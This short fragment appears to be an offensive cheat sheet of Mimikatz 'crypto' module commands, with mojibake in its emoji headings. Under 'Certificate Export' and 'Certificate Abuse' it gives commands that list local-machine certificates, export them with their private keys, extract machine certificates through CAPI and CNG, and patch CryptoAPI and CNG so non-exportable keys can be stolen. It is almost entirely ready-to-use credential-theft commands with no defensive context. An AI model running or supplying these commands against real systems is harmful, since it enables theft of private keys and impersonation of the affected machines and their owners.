๐ Certificate Management
๐ค Certificate Export
# List certificates
crypto::certificates /systemstore:local_machine
# Export with private keys
crypto::certificates /systemstore:local_machine /export
๐ Certificate Abuse
# Extract machine certificates
crypto::capi
crypto::cng
# Patch CryptoAPI
crypto::capi /patch
crypto::cng /patch